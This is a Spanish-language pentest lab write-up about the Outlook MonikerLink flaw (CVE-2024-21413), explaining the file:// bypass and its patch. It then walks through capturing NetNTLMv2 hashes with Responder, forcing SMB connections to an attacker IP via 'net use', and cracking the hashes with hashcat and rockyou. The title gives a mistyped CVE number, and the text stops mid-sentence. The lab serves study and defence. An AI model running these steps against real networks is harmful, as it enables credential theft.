
Laboratorio creado para PenTest de la Vuln CVE 2024-214113 (MONIKER LINK).
Este proyecto tuvo como objetivo estudiar la vulnerabilidad CVE-2024-21413 (MonikerLink), explorando cómo el protocolo SMB/NTLM puede ser abusado para captura de credenciales.
Incluso después de la corrección oficial de Microsoft, el laboratorio muestra que el concepto sigue siendo válido en escenarios internos.
La vulnerabilidad (CVE-2024-21413), conocida como MonikerLink, fue clasificada como crítica (CVSS 9.8). Ocurre porque Outlook procesaba enlaces "file://" de forma insegura, utilizando APIs antiguas de COM (Moniker Objects). Estos objetos permitían que Outlook llamara a recursos externos sin pasar por la Protected View, induciendo al cliente a iniciar conexiones SMB automáticamente.
Es una característica de Windows que permite referenciar objetos COM mediante enlaces especiales.
El exploit original abusaba de enlaces "file://" o rutas UNC enviados por correo electrónico.
Al agregar el carácter "!" en el enlace, era posible sortear protecciones internas de Outlook, forzando la apertura directa del recurso externo.
Esto resultaba en autenticación NTLM automática, exponiendo hashes NetNTLMv2 al atacante sin interacción significativa del usuario.
El parche KB5002519 bloquea específicamente este comportamiento en Outlook, impidiendo que los enlaces "file://" se procesen de esta manera.
Sin embargo, el NTLM automático de Windows sigue funcionando fuera del contexto de Outlook, es decir, cualquier intento de acceder a recursos SMB en un entorno donde NTLM esté habilitado y no haya restricciones de autenticación aún puede generar el envío automático de hashes.
📌 Relación entre Outlook, SMB/NTLM y Responder Exploit original: mediante spam de correo electrónico con enlace malicioso → Outlook procesaba → NTLM autenticaba automáticamente → atacante recibía hash.
Laboratorio interno: simulamos solo la parte conceptual → forzamos manualmente la conexión SMB → Responder capturó el hash → Hashcat realizó el cracking.
¿Por qué sigue funcionando? Porque NTLM es un protocolo heredado que autentica automáticamente en conexiones SMB, independientemente de Outlook. El parche corrige el cliente Outlook, pero no elimina el comportamiento de NTLM en Windows


Durante las pruebas, Outlook bloqueó enlaces file:// provenientes de correo electrónico, mostrando alerta de seguridad:

El parche KB5002519, lanzado en febrero de 2024, mitiga el vector externo vía correo electrónico al bloquear enlaces file://.
No obstante, el protocolo NTLM sigue permitiendo la autenticación automática en conexiones SMB.
Esto significa que, aunque Outlook esté protegido contra este exploit específico, la superficie de ataque interna sigue siendo válida.
La raíz del problema está en la dependencia de NTLM como mecanismo de autenticación, que continúa siendo susceptible a la captura de hashes en conexiones SMB.
sudo responder -I eth0

Mediante el Explorador, accediendo manualmente a:
\\<IP del atacante>\test.

Mediante terminal (cmd o PowerShell), usando el comando:
net use \\<IP del atacante>\test

/usr/share/responder/logs/SMB-NTLMv2-SSP-<IP>.txt

hashcat -m 5600 -a 0 ~/hash.txt /usr/share/wordlists/rockyou.txt
Nota:
La contraseña real no se muestra por razones de seguridad. El objetivo es demostrar el proceso y la vulnerabilidad.

Este laboratorio evidenció que: